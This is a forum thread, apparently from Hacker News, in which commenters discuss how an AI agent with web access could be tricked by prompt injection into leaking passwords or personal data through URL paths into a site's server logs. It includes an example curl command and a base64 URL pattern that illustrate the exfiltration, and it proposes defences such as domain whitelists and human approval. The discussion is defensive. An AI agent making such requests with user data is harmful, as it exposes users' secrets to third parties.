[wavemode]

The mere act of browsing the web is "write permissions". If I visit example.com/<my password>, I've now written my password into the web server logs of that site. So the only remaining question is whether I can be tricked/coerced into doing so.

I do tend to think this risk is somewhat mitigated if you have a whitelist of allowed domains that the claw can make HTTP requests to. But I haven't seen many people doing this.

[gopher_space]

I'm using something that pops up an OAuth window in the browser as needed. I think the general idea is that secrets are handled at the local harness level.

From my limited understanding it seems like writing a little MCP server that defines domains and abilities might work as an additive filter.

[esafak]

Most web sites don't let you create service accounts; they're built for humans.

[dragonwriter]

Many consumer websites intended for humans do let you create limited-privilege accounts that require approval from a master account for sensitive operations, but these are usually accounts for services that target families and the limited-privilege accounts are intended for children.

[dmoy]

Is this reply meant to be for a different comment?

[esafak]

No. I was trying to explain that providing web access shouldn't be tantamount to handing over the keys. You should be able to use sites and apps through a limited service account, but this requires them to be built with agents and authorization in mind. REST APIs often exist but are usually written with developers in mind. If agents are going to go maintstream, these APIs need to be more user friendly.

[jmholla]

That's not what the parent comment was saying. They are pointing out that you can exfiltrate secret information by querying any web page with that secret information in the path. `curl www.google.com/my-bank-password`. Now, google logs have my bank password in them.

[jauntywundrkind]

The thought that occurs to me is, the action here that actually needs gating is maybe not the web browsing: it's accessing credentials. That should be relatively easy to gate off behind human approval!

I'd also point out this a place where 2FA/MFA might be super helpful. Your phone or whatever is already going to alert you. There's a little bit of a challenge in being confident your bot isn't being tricked, in ascertaining even if the bot tells you that it really is safe to approve. But it's still a deliberation layer to go through. Our valuable things do often have these additional layers of defense to go through that would require somewhat more advanced systems to bot through, that I don't think are common at all.

Overall I think the will here to reject & deny, the fear uncertainty and doubt is both valid and true, but that people are trying way way way too hard, and it saddens me to see such a strong manifestation of fear. I realize the techies know enough to be horrified strongly by it all, but also, I really want us to be an excited forward looking group, that is interested in tackling challenges, rather than being interested only in critiques & teardowns. This feels like an incredible adventure & I wish to en Courage everyone.

[wavemode]

You do need to gate the web browsing. 2FA and/or credential storage helps with passwords, but it doesn't help with other private information. If the claw is currently, or was recently, working with any files on your computer or any of your personal online accounts, then the contents of those files/webpages are in the model context. So a simple HTTP request to example.com/<base64(personal info)> presents the exact same risk.

You can take whatever risks you feel are acceptable for your personal usage - probably nobody cares enough to target an effective prompt-injection attack against you. But corporations? I would bet a large sum of money that within the next few years we will be hearing multiple stories about data breaches caused by this exact vulnerability, due to employees being lazy about limiting the claw's ability to browse the web.